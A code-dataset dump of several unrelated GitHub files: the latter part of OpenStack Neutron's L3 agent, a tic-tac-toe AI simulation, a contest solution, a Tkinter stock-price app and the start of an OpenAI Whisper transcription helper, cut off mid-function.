when exiting, \"\n \"data-plane will be affected.\")\n\n def _check_ha_router_process_status(self):\n \"\"\"Check HA router VRRP process status in network node.\n\n Check if the HA router HA routers VRRP (keepalived) process count\n and state change python monitor process count meet the expected\n quantity. If so, l3-agent will not call neutron to set all related\n HA port to down state, this can prevent some unexpected VRRP\n re-election. If not, a physical host may have down and just\n restarted, set HA network port status to DOWN.\n \"\"\"\n if (self.conf.agent_mode not in [lib_const.L3_AGENT_MODE_DVR_SNAT,\n lib_const.L3_AGENT_MODE_LEGACY]):\n return\n\n if self.ha_router_count <= 0:\n return\n\n # Only set HA ports down when host was rebooted so no net\n # namespaces were still created.\n if any(ns.startswith(l3_namespaces.NS_PREFIX) for ns in\n self.namespaces_manager.list_all()):\n LOG.debug(\"Network configuration already done. Skipping\"\n \" set HA port to DOWN state.\")\n return\n\n LOG.debug(\"Call neutron server to set HA port to DOWN state.\")\n try:\n # We set HA network port status to DOWN to let l2 agent\n # update it to ACTIVE after wiring. This allows us to spawn\n # keepalived only when l2 agent finished wiring the port.\n self.plugin_rpc.update_all_ha_network_port_statuses(\n self.context)\n except Exception:\n LOG.exception('update_all_ha_network_port_statuses failed')\n\n def _register_router_cls(self, factory):\n factory.register([], legacy_router.LegacyRouter)\n factory.register(['ha'], ha_router.HaRouter)\n\n if self.conf.agent_mode == lib_const.L3_AGENT_MODE_DVR_SNAT:\n factory.register(['distributed'],\n dvr_router.DvrEdgeRouter)\n factory.register(['ha', 'distributed'],\n dvr_edge_ha_router.DvrEdgeHaRouter)\n else:\n factory.register(['distributed'],\n dvr_local_router.DvrLocalRouter)\n factory.register(['ha', 'distributed'],\n dvr_local_router.DvrLocalRouter)\n\n def _check_config_params(self):\n \"\"\"Check items in configuration files.\n\n Check for required and invalid configuration items.\n The actual values are not verified for correctness.\n \"\"\"\n if not self.conf.interface_driver:\n msg = 'An interface driver must be specified'\n LOG.error(msg)\n raise SystemExit(1)\n\n if self.conf.ipv6_gateway:\n # ipv6_gateway configured. Check for valid v6 link-local address.\n try:\n msg = (\"%s used in config as ipv6_gateway is not a valid \"\n \"IPv6 link-local address.\")\n ip_addr = netaddr.IPAddress(self.conf.ipv6_gateway)\n if ip_addr.version != 6 or not ip_addr.is_link_local():\n LOG.error(msg, self.conf.ipv6_gateway)\n raise SystemExit(1)\n except netaddr.AddrFormatError:\n LOG.error(msg, self.conf.ipv6_gateway)\n raise SystemExit(1)\n\n def _create_router(self, router_id, router):\n kwargs = {\n 'agent': self,\n 'router_id': router_id,\n 'router': router,\n 'use_ipv6': self.use_ipv6,\n 'agent_conf': self.conf,\n 'interface_driver': self.driver,\n }\n\n features = []\n if router.get('distributed'):\n features.append('distributed')\n kwargs['host'] = self.host\n\n if router.get('ha'):\n features.append('ha')\n\n if router.get('distributed') and router.get('ha'):\n # Case 1: If the router contains information about the HA interface\n # and if the requesting agent is a DVR_SNAT agent then go ahead\n # and create a HA router.\n # Case 2: If the router does not contain information about the HA\n # interface this means that this DVR+HA router needs to host only\n # the edge side of it, typically because it's landing on a node\n # that needs to provision a router namespace because of a DVR\n # service port (e.g. DHCP). So go ahead and create a regular DVR\n # edge router.\n if (not router.get(lib_const.HA_INTERFACE_KEY) or\n self.conf.agent_mode != lib_const.L3_AGENT_MODE_DVR_SNAT):\n features.remove('ha')\n\n return self.router_factory.create(features, **kwargs)\n\n @lockutils.synchronized('resize_greenpool')\n def _resize_process_pool(self):\n pool_size = max([ROUTER_PROCESS_GREENLET_MIN,\n min([ROUTER_PROCESS_GREENLET_MAX,\n len(self.router_info)])])\n if pool_size == self._pool_size:\n return\n LOG.info(\"Resizing router processing queue green pool size to: %d\",\n pool_size)\n self._pool.resize(pool_size)\n self._pool_size = pool_size\n\n def _router_added(self, router_id, router):\n ri = self._create_router(router_id, router)\n registry.publish(resources.ROUTER, events.BEFORE_CREATE, self,\n payload=events.DBEventPayload(\n self.context,\n resource_id=router_id,\n states=(ri,)))\n\n self.router_info[router_id] = ri\n\n # If initialize() fails, cleanup and retrigger complete sync\n try:\n ri.initialize(self.process_monitor)\n except Exception:\n with excutils.save_and_reraise_exception():\n LOG.exception('Error while initializing router %s',\n router_id)\n self._cleanup_failed_router(router_id, delete_router_info=True)\n\n self._resize_process_pool()\n\n def _cleanup_failed_router(self, router_id, delete_router_info):\n ri = self.router_info.pop(router_id)\n self.namespaces_manager.ensure_router_cleanup(router_id)\n try:\n if delete_router_info:\n ri.delete()\n except Exception:\n LOG.exception('Error while deleting router %s',\n router_id)\n\n def _safe_router_removed(self, router_id):\n \"\"\"Try to delete a router and return True if successful.\"\"\"\n # The l3_ext_manager API expects a router dict, look it up\n ri = self.router_info.get(router_id)\n\n try:\n if ri:\n self.l3_ext_manager.delete_router(self.context, ri.router)\n self._router_removed(ri, router_id)\n except Exception:\n LOG.exception('Error while deleting router %s', router_id)\n return False\n\n self._resize_process_pool()\n return True\n\n def _router_removed(self, ri, router_id):\n \"\"\"Delete the router and stop the auxiliary processes\n\n This stops the auxiliary processes (keepalived, keepvalived-state-\n change, radvd, etc) and deletes the router ports and the namespace.\n The \"router_info\" cache is updated too at the beginning of the process,\n to avoid any other concurrent process to handle the router being\n deleted. If an exception is raised, the \"router_info\" cache is\n restored.\n \"\"\"\n if ri is None:\n LOG.warning(\"Info for router %s was not found. \"\n \"Performing router cleanup\", router_id)\n self.namespaces_manager.ensure_router_cleanup(router_id)\n return\n\n registry.publish(resources.ROUTER, events.BEFORE_DELETE, self,\n payload=events.DBEventPayload(\n self.context, states=(ri,),\n resource_id=router_id))\n\n del self.router_info[router_id]\n try:\n ri.delete()\n except Exception:\n with excutils.save_and_reraise_exception():\n self.router_info[router_id] = ri\n LOG.debug(\"Router info %s delete action done, \"\n \"and it was removed from cache.\", router_id)\n\n registry.publish(resources.ROUTER, events.AFTER_DELETE, self,\n payload=events.DBEventPayload(\n self.context,\n resource_id=router_id,\n states=(ri,)))\n\n def init_extension_manager(self, connection):\n l3_ext_manager.register_opts(self.conf)\n self.agent_api = l3_ext_api.L3AgentExtensionAPI(self.router_info,\n self.router_factory)\n self.l3_ext_manager = (\n l3_ext_manager.L3AgentExtensionsManager(self.conf))\n self.l3_ext_manager.initialize(\n connection, lib_const.L3_AGENT_MODE,\n self.agent_api)\n\n def router_deleted(self, context, router_id):\n \"\"\"Deal with router deletion RPC message.\"\"\"\n LOG.debug('Got router deleted notification for %s', router_id)\n update = queue.ResourceUpdate(router_id,\n PRIORITY_RPC,\n action=DELETE_ROUTER)\n self._queue.add(update)\n\n def routers_updated(self, context, routers):\n \"\"\"Deal with routers modification and creation RPC message.\"\"\"\n LOG.debug('Got routers updated notification :%s', routers)\n if routers:\n # This is needed for backward compatibility\n if isinstance(routers[0], dict):\n routers = [router['id'] for router in routers]\n for id in routers:\n update = queue.ResourceUpdate(\n id, PRIORITY_RPC, action=ADD_UPDATE_ROUTER)\n self._queue.add(update)\n\n def router_removed_from_agent(self, context, payload):\n LOG.debug('Got router removed from agent :%r', payload)\n router_id = payload['router_id']\n update = queue.ResourceUpdate(router_id,\n PRIORITY_RPC,\n action=DELETE_ROUTER)\n self._queue.add(update)\n\n def router_added_to_agent(self, context, payload):\n LOG.debug('Got router added to agent :%r', payload)\n self.routers_updated(context, payload)\n\n def network_update(self, context, **kwargs):\n network_id = kwargs['network']['id']\n LOG.debug(\"Got network %s update\", network_id)\n for ri in self.router_info.values():\n update = queue.ResourceUpdate(ri.router_id,\n PRIORITY_RPC,\n action=UPDATE_NETWORK,\n resource=network_id)\n self._queue.add(update)\n\n def _process_network_update(self, router_id, network_id):\n\n def _port_belongs(p):\n return p['network_id'] == network_id\n\n ri = self.router_info.get(router_id)\n if not ri:\n return\n LOG.debug(\"Checking if router %s is plugged to the network %s\",\n ri, network_id)\n ports = list(ri.internal_ports)\n if ri.ex_gw_port:\n ports.append(ri.ex_gw_port)\n if any(_port_belongs(p) for p in ports):\n update = queue.ResourceUpdate(\n ri.router_id, PRIORITY_SYNC_ROUTERS_TASK)\n self._resync_router(update)\n\n def _process_router_if_compatible(self, router):\n # Either ex_net_id or handle_internal_only_routers must be set\n ex_net_id = (router['external_gateway_info'] or {}).get('network_id')\n if not ex_net_id and not self.conf.handle_internal_only_routers:\n raise l3_exc.RouterNotCompatibleWithAgent(router_id=router['id'])\n\n if router['id'] not in self.router_info:\n LOG.debug(\"Router %s info not in cache, \"\n \"will do the router add action.\", router['id'])\n self._process_added_router(router)\n else:\n LOG.debug(\"Router %s info in cache, \"\n \"will do the router update action.\", router['id'])\n self._process_updated_router(router)\n\n def _process_added_router(self, router):\n self._router_added(router['id'], router)\n ri = self.router_info[router['id']]\n ri.router = router\n try:\n ri.process()\n except Exception:\n with excutils.save_and_reraise_exception():\n LOG.exception('Error while processing router %s',\n router['id'])\n # NOTE(slaweq): deleting of the router info in the\n # _cleanup_failed_router is avoided as in case of error,\n # processing of the router will be retried on next call and\n # that may lead to some race conditions e.g. with\n # configuration of the DVR router's FIP gateway\n self._cleanup_failed_router(router['id'],\n delete_router_info=False)\n\n registry.publish(resources.ROUTER, events.AFTER_CREATE, self,\n payload=events.DBEventPayload(\n self.context,\n resource_id=router['id'],\n states=(ri,)))\n\n self.l3_ext_manager.add_router(self.context, router)\n\n def _process_updated_router(self, router):\n ri = self.router_info[router['id']]\n\n router_ha = router.get('ha')\n router_distributed = router.get('distributed')\n if ((router_ha is not None and ri.router.get('ha') != router_ha) or\n (router_distributed is not None and\n ri.router.get('distributed') != router_distributed)):\n LOG.warning('Type of the router %(id)s changed. '\n 'Old type: ha=%(old_ha)s; distributed=%(old_dvr)s; '\n 'New type: ha=%(new_ha)s; distributed=%(new_dvr)s',\n {'id': router['id'],\n 'old_ha': ri.router.get('ha'),\n 'old_dvr': ri.router.get('distributed'),\n 'new_ha': router.get('ha'),\n 'new_dvr': router.get('distributed')})\n ri = self._create_router(router['id'], router)\n self.router_info[router['id']] = ri\n\n is_dvr_snat_agent = (self.conf.agent_mode ==\n lib_const.L3_AGENT_MODE_DVR_SNAT)\n is_dvr_only_agent = (self.conf.agent_mode in\n [lib_const.L3_AGENT_MODE_DVR,\n lib_const.L3_AGENT_MODE_DVR_NO_EXTERNAL])\n old_router_ha_interface = ri.router.get(lib_const.HA_INTERFACE_KEY)\n current_router_ha_interface = router.get(lib_const.HA_INTERFACE_KEY)\n ha_interface_change = ((old_router_ha_interface is None and\n current_router_ha_interface is not None) or\n (old_router_ha_interface is not None and\n current_router_ha_interface is None))\n is_dvr_ha_router = router.get('distributed') and router.get('ha')\n\n if is_dvr_snat_agent and is_dvr_ha_router and ha_interface_change:\n LOG.debug(\"Removing HA router %s, since it is not bound to \"\n \"the current agent, and recreating regular DVR router \"\n \"based on service port requirements.\",\n router['id'])\n if self._safe_router_removed(router['id']):\n self._process_added_router(router)\n else:\n is_ha_router = getattr(ri, 'ha_state', False)\n # For HA routers check that DB state matches actual state\n if router.get('ha') and not is_dvr_only_agent and is_ha_router:\n self.check_ha_state_for_router(\n router['id'], router.get(lib_const.HA_ROUTER_STATE_KEY))\n ri.router = router\n registry.publish(resources.ROUTER, events.BEFORE_UPDATE, self,\n payload=events.DBEventPayload(\n self.context,\n resource_id=router['id'],\n states=(ri,)))\n\n ri.process()\n registry.publish(resources.ROUTER, events.AFTER_UPDATE, self,\n payload=events.DBEventPayload(\n self.context,\n resource_id=router['id'],\n states=(None, ri)))\n self.l3_ext_manager.update_router(self.context, router)\n\n def _resync_router(self, router_update,\n priority=PRIORITY_SYNC_ROUTERS_TASK):\n # Don't keep trying to resync if it's failing\n if router_update.hit_retry_limit():\n LOG.warning(\"Hit retry limit with router update for %s, action %s\",\n router_update.id, router_update.action)\n return\n router_update.timestamp = timeutils.utcnow()\n router_update.priority = priority\n router_update.resource = None # Force the agent to resync the router\n self._queue.add(router_update)\n\n def _process_update(self):\n if self._exiting:\n return\n\n for rp, update in self._queue.each_update_to_next_resource():\n LOG.info(\"Starting processing update %s, action %s, priority %s, \"\n \"update_id %s. Wait time elapsed: %.3f\",\n update.id, update.action, update.priority,\n update.update_id,\n update.time_elapsed_since_create)\n if update.action == UPDATE_NETWORK:\n self._process_network_update(\n router_id=update.id,\n network_id=update.resource)\n else:\n self._process_router_update(rp, update)\n\n def _process_router_update(self, rp, update):\n LOG.info(\"Starting router update for %s, action %s, priority %s, \"\n \"update_id %s. Wait time elapsed: %.3f\",\n update.id, update.action, update.priority,\n update.update_id,\n update.time_elapsed_since_create)\n if update.action == PD_UPDATE:\n self.pd.process_prefix_update()\n LOG.info(\"Finished a router update for %s IPv6 PD, \"\n \"update_id. %s. Time elapsed: %.3f\",\n update.id, update.update_id,\n update.time_elapsed_since_start)\n return\n\n routers = [update.resource] if update.resource else []\n\n not_delete_no_routers = (update.action != DELETE_ROUTER and\n not routers)\n related_action = update.action in (DELETE_RELATED_ROUTER,\n ADD_UPDATE_RELATED_ROUTER)\n if not_delete_no_routers or related_action:\n try:\n update.timestamp = timeutils.utcnow()\n routers = self.plugin_rpc.get_routers(self.context,\n [update.id])\n except Exception:\n msg = \"Failed to fetch router information for '%s'\"\n LOG.exception(msg, update.id)\n self._resync_router(update)\n return\n\n # For a related action, verify the router is still hosted here,\n # since it could have just been deleted and we don't want to\n # add it back.\n if related_action:\n routers = [r for r in routers if r['id'] == update.id]\n\n if not routers:\n removed = self._safe_router_removed(update.id)\n if not removed:\n self._resync_router(update)\n else:\n # need to update timestamp of removed router in case\n # there are older events for the same router in the\n # processing queue (like events from fullsync) in order to\n # prevent deleted router re-creation\n rp.fetched_and_processed(update.timestamp)\n LOG.info(\"Finished a router delete for %s, update_id %s. \"\n \"Time elapsed: %.3f\",\n update.id, update.update_id,\n update.time_elapsed_since_start)\n return\n\n if not self._process_routers_if_compatible(routers, update):\n self._resync_router(update)\n return\n\n rp.fetched_and_processed(update.timestamp)\n LOG.info(\"Finished a router update for %s, update_id %s. \"\n \"Time elapsed: %.3f\",\n update.id, update.update_id,\n update.time_elapsed_since_start)\n\n def _process_routers_if_compatible(self, routers, update):\n process_result = True\n for router in routers:\n if router['id'] != update.id:\n # Don't do the work here, instead create a new update and\n # enqueue it, since there could be another thread working\n # on it already and we don't want to race.\n new_action = RELATED_ACTION_MAP.get(\n update.action, ADD_UPDATE_RELATED_ROUTER)\n new_update = queue.ResourceUpdate(\n router['id'],\n priority=PRIORITY_RELATED_ROUTER,\n action=new_action)\n self._queue.add(new_update)\n LOG.debug('Queued a router update for %(router_id)s '\n '(related router %(related_router_id)s). '\n 'Original event action %(action)s, '\n 'priority %(priority)s. '\n 'New event action %(new_action)s, '\n 'priority %(new_priority)s',\n {'router_id': router['id'],\n 'related_router_id': update.id,\n 'action': update.action,\n 'priority': update.priority,\n 'new_action': new_update.action,\n 'new_priority': new_update.priority})\n continue\n\n try:\n self._process_router_if_compatible(router)\n except l3_exc.RouterNotCompatibleWithAgent as e:\n log_verbose_exc(e.msg, router)\n # Was the router previously handled by this agent?\n if router['id'] in self.router_info:\n LOG.error(\"Removing incompatible router '%s'\",\n router['id'])\n self._safe_router_removed(router['id'])\n except Exception:\n log_verbose_exc(\n \"Failed to process compatible router: %s\" % update.id,\n router)\n process_result = False\n return process_result\n\n def _process_routers_loop(self):\n LOG.debug(\"Starting _process_routers_loop\")\n while not self._exiting:\n self._pool.spawn_n(self._process_update)\n\n # NOTE(kevinbenton): this is set to 1 second because the actual interval\n # is controlled by a FixedIntervalLoopingCall in neutron/service.py that\n # is responsible for task execution.\n @periodic_task.periodic_task(spacing=1, run_immediately=True)\n def periodic_sync_routers_task(self, context):\n if not self.fullsync:\n return\n LOG.debug(\"Starting fullsync periodic_sync_routers_task\")\n\n # self.fullsync is True at this point. If an exception -- caught or\n # uncaught -- prevents setting it to False below then the next call\n # to periodic_sync_routers_task will re-enter this code and try again.\n\n # Context manager self.namespaces_manager captures a picture of\n # namespaces *before* fetch_and_sync_all_routers fetches the full list\n # of routers from the database. This is important to correctly\n # identify stale ones.\n\n try:\n with self.namespaces_manager as ns_manager:\n self.fetch_and_sync_all_routers(context, ns_manager)\n except l3_exc.AbortSyncRouters:\n self.fullsync = True\n\n def fetch_and_sync_all_routers(self, context, ns_manager):\n prev_router_ids = set(self.router_info)\n curr_router_ids = set()\n timestamp = timeutils.utcnow()\n router_ids = []\n chunk = []\n is_snat_agent = (self.conf.agent_mode ==\n lib_const.L3_AGENT_MODE_DVR_SNAT)\n try:\n router_ids = self.plugin_rpc.get_router_ids(context)\n # fetch routers by chunks to reduce the load on server and to\n # start router processing earlier\n for i in range(0, len(router_ids), self.sync_routers_chunk_size):\n chunk = router_ids[i:i + self.sync_routers_chunk_size]\n routers = self.plugin_rpc.get_routers(context, chunk)\n LOG.debug('Processing :%r', routers)\n for r in routers:\n curr_router_ids.add(r['id'])\n ns_manager.keep_router(r['id'])\n if r.get('distributed'):\n # need to keep fip namespaces as well\n ext_net_id = (r['external_gateway_info'] or {}).get(\n 'network_id')\n if ext_net_id:\n ns_manager.keep_ext_net(ext_net_id)\n elif is_snat_agent and not r.get('ha'):\n ns_manager.ensure_snat_cleanup(r['id'])\n update = queue.ResourceUpdate(\n r['id'],\n PRIORITY_SYNC_ROUTERS_TASK,\n resource=r,\n action=ADD_UPDATE_ROUTER,\n timestamp=timestamp)\n self._queue.add(update)\n except oslo_messaging.MessagingTimeout:\n if self.sync_routers_chunk_size > SYNC_ROUTERS_MIN_CHUNK_SIZE:\n self.sync_routers_chunk_size = max(\n self.sync_routers_chunk_size // 2,\n SYNC_ROUTERS_MIN_CHUNK_SIZE)\n LOG.error('Server failed to return info for routers in '\n 'required time, decreasing chunk size to: %s',\n self.sync_routers_chunk_size)\n else:\n LOG.error('Server failed to return info for routers in '\n 'required time even with min chunk size: %s. '\n 'It might be under very high load or '\n 'just inoperable',\n self.sync_routers_chunk_size)\n raise\n except oslo_messaging.MessagingException:\n failed_routers = chunk or router_ids\n LOG.exception(\"Failed synchronizing routers '%s' \"\n \"due to RPC error\", failed_routers)\n raise l3_exc.AbortSyncRouters()\n\n self.fullsync = False\n LOG.debug(\"periodic_sync_routers_task successfully completed\")\n # adjust chunk size after successful sync\n if self.sync_routers_chunk_size < SYNC_ROUTERS_MAX_CHUNK_SIZE:\n self.sync_routers_chunk_size = min(\n self.sync_routers_chunk_size + SYNC_ROUTERS_MIN_CHUNK_SIZE,\n SYNC_ROUTERS_MAX_CHUNK_SIZE)\n\n # Delete routers that have disappeared since the last sync\n for router_id in prev_router_ids - curr_router_ids:\n ns_manager.keep_router(router_id)\n update = queue.ResourceUpdate(router_id,\n PRIORITY_SYNC_ROUTERS_TASK,\n timestamp=timestamp,\n action=DELETE_ROUTER)\n self._queue.add(update)\n\n @property\n def context(self):\n # generate a new request-id on each call to make server side tracking\n # of RPC calls easier.\n self._context.request_id = common_context.generate_request_id()\n return self._context\n\n def after_start(self):\n # Note: the FWaaS' vArmourL3NATAgent is a subclass of L3NATAgent. It\n # calls this method here. So Removing this after_start() would break\n # vArmourL3NATAgent. We need to find out whether vArmourL3NATAgent\n # can have L3NATAgentWithStateReport as its base class instead of\n # L3NATAgent.\n eventlet.spawn_n(self._process_routers_loop)\n LOG.info(\"L3 agent started\")\n\n def stop(self):\n LOG.info(\"Stopping L3 agent\")\n if self.conf.cleanup_on_shutdown:\n self._exiting = True\n for router in self.router_info.values():\n router.delete()\n\n def create_pd_router_update(self):\n router_id = None\n update = queue.ResourceUpdate(router_id,\n PRIORITY_PD_UPDATE,\n timestamp=timeutils.utcnow(),\n action=PD_UPDATE)\n self._queue.add(update)\n\n\nclass L3NATAgentWithStateReport(L3NATAgent):\n\n def __init__(self, host, conf=None):\n super(L3NATAgentWithStateReport, self).__init__(host=host, conf=conf)\n self.state_rpc = agent_rpc.PluginReportStateAPI(topics.REPORTS)\n self.failed_report_state = False\n self.agent_state = {\n 'binary': lib_const.AGENT_PROCESS_L3,\n 'host': host,\n 'availability_zone': self.conf.AGENT.availability_zone,\n 'topic': topics.L3_AGENT,\n 'configurations': {\n 'agent_mode': self.conf.agent_mode,\n 'handle_internal_only_routers':\n self.conf.handle_internal_only_routers,\n 'interface_driver': self.conf.interface_driver,\n 'log_agent_heartbeats': self.conf.AGENT.log_agent_heartbeats,\n 'extensions': self.l3_ext_manager.names()},\n 'start_flag': True,\n 'agent_type': lib_const.AGENT_TYPE_L3}\n report_interval = self.conf.AGENT.report_interval\n if report_interval:\n self.heartbeat = loopingcall.FixedIntervalLoopingCall(\n self._report_state)\n self.heartbeat.start(interval=report_interval)\n\n def _report_state(self):\n num_ex_gw_ports = 0\n num_interfaces = 0\n num_floating_ips = 0\n router_infos = self.router_info.values()\n num_routers = len(router_infos)\n for ri in router_infos:\n ex_gw_port = ri.get_ex_gw_port()\n if ex_gw_port:\n num_ex_gw_ports += 1\n num_interfaces += len(ri.router.get(lib_const.INTERFACE_KEY,\n []))\n num_floating_ips += len(ri.router.get(lib_const.FLOATINGIP_KEY,\n []))\n configurations = self.agent_state['configurations']\n configurations['routers'] = num_routers\n configurations['ex_gw_ports'] = num_ex_gw_ports\n configurations['interfaces'] = num_interfaces\n configurations['floating_ips'] = num_floating_ips\n try:\n agent_status = self.state_rpc.report_state(self.context,\n self.agent_state,\n True)\n if agent_status == agent_consts.AGENT_REVIVED:\n LOG.info('Agent has just been revived. '\n 'Doing a full sync.')\n self.fullsync = True\n self.agent_state.pop('start_flag', None)\n except AttributeError:\n # This means the server does not support report_state\n LOG.warning(\"Neutron server does not support state report. \"\n \"State report for this agent will be disabled.\")\n self.heartbeat.stop()\n return\n except Exception:\n self.failed_report_state = True\n LOG.exception(\"Failed reporting state!\")\n return\n if self.failed_report_state:\n self.failed_report_state = False\n LOG.info(\"Successfully reported state after a previous failure.\")\n\n def after_start(self):\n eventlet.spawn_n(self._process_routers_loop)\n LOG.info(\"L3 agent started\")\n # Do the report state before we do the first full sync.\n self._report_state()\n\n self.pd.after_start()\n\n def agent_updated(self, context, payload):\n \"\"\"Handle the agent_updated notification event.\"\"\"\n self.fullsync = True\n LOG.info(\"agent_updated by server side %s!\", payload)\n","repo_name":"openstack/neutron","sub_path":"neutron/agent/l3/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":46015,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"38285741725","text":"import random\n\ngrid = [[\" \", \" \", \" \"], [\" \", \" \", \" \"], [\" \", \" \", \" \"]]\n\n\ndef printgrid(grid):\n print(\" \" + grid[0][0] + \" | \" + grid[0][1] + \" | \" + grid[0][2])\n print(\"---+---+---\")\n print(\" \" + grid[1][0] + \" | \" + grid[1][1] + \" | \" + grid[1][2])\n print(\"---+---+---\")\n print(\" \" + grid[2][0] + \" | \" + grid[2][1] + \" | \" + grid[2][2])\n\n\nwinner = \"\"\n\n\ndef win(key, grid):\n for i in range(len(grid)):\n row = grid[i]\n vert1 = grid[0][i]\n vert2 = grid[1][i]\n vert3 = grid[2][i]\n\n if row[0] == row[1] == row[2] == key:\n return True\n elif vert1 == vert2 == vert3 == key:\n return True\n\n if grid[0][0] == grid[1][1] == grid[2][2] == key:\n return True\n elif grid[2][0] == grid[1][1] == grid[0][2] == key:\n return True\n\n return False\n\n\ndef ai():\n tempgrid = []\n for i in grid:\n temp = []\n for j in i:\n temp.append(j)\n tempgrid.append(temp)\n\n # trying to win\n for j in range(len(tempgrid)):\n for i in range(len(tempgrid[j])):\n if tempgrid[j][i] != \"X\" and tempgrid[j][i] != \"O\":\n tempgrid[j][i] = \"O\"\n if win(\"O\", tempgrid):\n return [j, i]\n tempgrid = []\n for y in grid:\n temp = []\n for x in y:\n temp.append(x)\n tempgrid.append(temp)\n\n # trying to block\n for j in range(len(tempgrid)):\n for i in range(len(tempgrid[j])):\n if tempgrid[j][i] != \"X\" and tempgrid[j][i] != \"O\":\n tempgrid[j][i] = \"X\"\n if win(\"X\", tempgrid):\n return [j, i]\n tempgrid = []\n for y in grid:\n temp = []\n for x in y:\n temp.append(x)\n tempgrid.append(temp)\n\n # trying to place next to eachother\n for j in range(len(tempgrid)):\n for i in range(len(tempgrid[j])):\n if tempgrid[j][i] == \"O\":\n off = [(0, 1), (1, 1), (1, 0), (1, -1), (0, -1), (-1, -1), (-1, 0), (-1, 1)]\n for k in range(len(off)):\n y = j + off[k][1]\n x = i + off[k][0]\n if x < 3 and x > -1 and y < 3 and y > -1 and tempgrid[y][x] == \" \":\n return [y, x]\n\n # random placment(for first turn)\n while True:\n if full():\n return 3\n y = random.randint(0, 2)\n x = random.randint(0, 2)\n if tempgrid[y][x] != \"X\":\n return [y, x]\n\n\ndef full():\n for i in grid:\n for y in i:\n if y == \" \":\n return False\n return True\n\n\ncompwin = 0\nrandomwin = 0\nties = 0\n\nfor i in range(1000):\n grid = [[\" \", \" \", \" \"], [\" \", \" \", \" \"], [\" \", \" \", \" \"]]\n\n while True:\n while True:\n if full():\n break\n y = random.randint(0, 2)\n x = random.randint(0, 2)\n if grid[y][x] == \" \":\n grid[y][x] = \"X\"\n break\n\n if full():\n if win(\"O\", grid):\n compwin += 1\n break\n elif win(\"X\", grid):\n randomwin += 1\n break\n elif full():\n ties += 1\n break\n\n Olis = ai()\n if Olis != 3:\n grid[Olis[0]][Olis[1]] = \"O\"\n\n if win(\"O\", grid):\n compwin += 1\n break\n elif win(\"X\", grid):\n randomwin += 1\n break\n\nprint(\"TIES: \" + str(ties))\nprint(\"RANDOM WINS: \" + str(randomwin))\nprint(\"COMPUTER WINS: \" + str(compwin))\n","repo_name":"AuritroSaha/auritro_coding_portfolio","sub_path":"JUNI/Python Level 3/AM14 - Master Project/Tic Tac Toe AI Test.py","file_name":"Tic Tac Toe AI Test.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36500541873","text":"from collections import Counter\n\nalfab = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\nt = int(input())\n\nfor _ in range(t):\n input()\n log = input()\n freq = Counter(log)\n\n #print(freq)\n\n solved = [char for char in alfab if freq[char] >= alfab.index(char) + 1]\n\n print(len(solved))\n","repo_name":"RaulMyron/programacao-competitiva","sub_path":"contests/atcoders/19-12-2023/a2.py","file_name":"a2.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35123065688","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom ApiResponse import ApiFinance\n\n\nclass TkinterApp:\n\n def __init__(self):\n self.root = tk.Tk()\n self.api_finance = ApiFinance()\n self.tkinterRun()\n\n \n def tkinterRun(self):\n self.root.geometry(\"500x400\")\n \n self.root.columnconfigure(0, weight=1)\n self.root.columnconfigure(1, weight=3)\n\n label1 = tk.Label(self.root, text = 'Enter stock ticker').grid(row=1, column=1, sticky='N', pady=2)#.pack()\n stockInput = tk.StringVar(value = 'WPC')\n bar1 = tk.Entry(self.root, textvariable=stockInput, width=50, fg=\"green\", selectbackground='yellow').grid(row=2, column=1, sticky='N', pady=2)#.pack()\n labelCurrency = tk.Label(self.root)\n labelStockPrice = tk.Label(self.root)\n #labelStockPrice.grid(row = 3, column = 0, sticky = 'W', pady =2)\n button1 = tk.Button(self.root, text=\"search\", fg='White', bg='green', height=1, width=10, command=lambda: self.button_func(stockInput,labelCurrency,labelStockPrice)).grid(row=3, column=1, sticky='N', pady=2)#.pack() \n #labelCurrency.pack()\n #labelStockPrice.pack()\n labelStockPrice.grid(row=4, column=0, sticky='W', pady=2)\n\n self.root.mainloop()\n\n def button_func(self, stockInput, labelCurrency,labelStockPrice):\n apiData = self.api_finance.api(stockInput.get())\n #labelCurrency.config(text = apiData['currency'])\n labelStockPrice.config(text = 'Stock price is ' + str(apiData['stockPrice'] )) # + str(apiData['currency'])\n\n\n","repo_name":"ArmyChicken/stocksApp","sub_path":"tkinterScript.py","file_name":"tkinterScript.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32939291314","text":"import openai\nfrom io import BytesIO\nimport tempfile\nimport os\nimport streamlit as st\n\n# Create a function to transcribe audio using Whisper\ndef transcribe_audio(api_key, audio_file):\n openai.api_key = api_key\n with BytesIO(audio_file.read()) as audio_bytes:\n # Get the extension of the uploaded file\n file_extension = os.path.splitext(audio_file.name)[-1]\n \n # Create a temporary file with the uploaded audio data and the correct extension\n with tempfile.NamedTemporaryFile(delete=False, suffix=file_extension) as temp_audio_file:\n temp_audio_file.write(audio_bytes.read())\n temp_audio_file.seek(0) # Move the file pointer to the beginning of the file\n \n # Transcribe the temporary audio file\n transcript = openai.Audio.translate(\"whisper-1\", temp_audio_file)\n\n return transcript\n\ndef call_gpt(api_key, prompt, model):\n openai.api_key = api_key\n response = openai.ChatCompletion.create(\n model=model,\n messages=[{\"role\": \"user\", \"content\": prompt}],\n temperature=0.5,\n max_tokens=400,\n )\n \n return response['choices'][0]['message']['content']\n\ndef call_gpt_streaming(api_key,prompt, model):\n openai.api_key = api_key\n response = openai.ChatCompletion.create(\n model=model,\n messages=[{\"role\": \"user\", \"content\": prompt}],\n temperature=0.7,\n stream=True\n )\n\n collected_events = []\n completion_text = ''\n placeholder = st.empty()\n\n for event in response:\n collected_events.append(event)\n # Check if content key exists\n if \"content\" in event['choices'][0][\"delta\"]:\n event_text = event['choices'][0][\"delta\"][\"content\"]\n completion_text += event_text\n placeholder.write(completion_text) # Write the received text\n return completion_text\n\n# Create a function to summarize the transcript using a custom prompt\ndef summarize_transcript(api_key, transcript, model, custom_prompt=None):\n openai.api_key = api_key\n prompt = f\"Please summarize the following audio transcription: {transcript}\"\n if 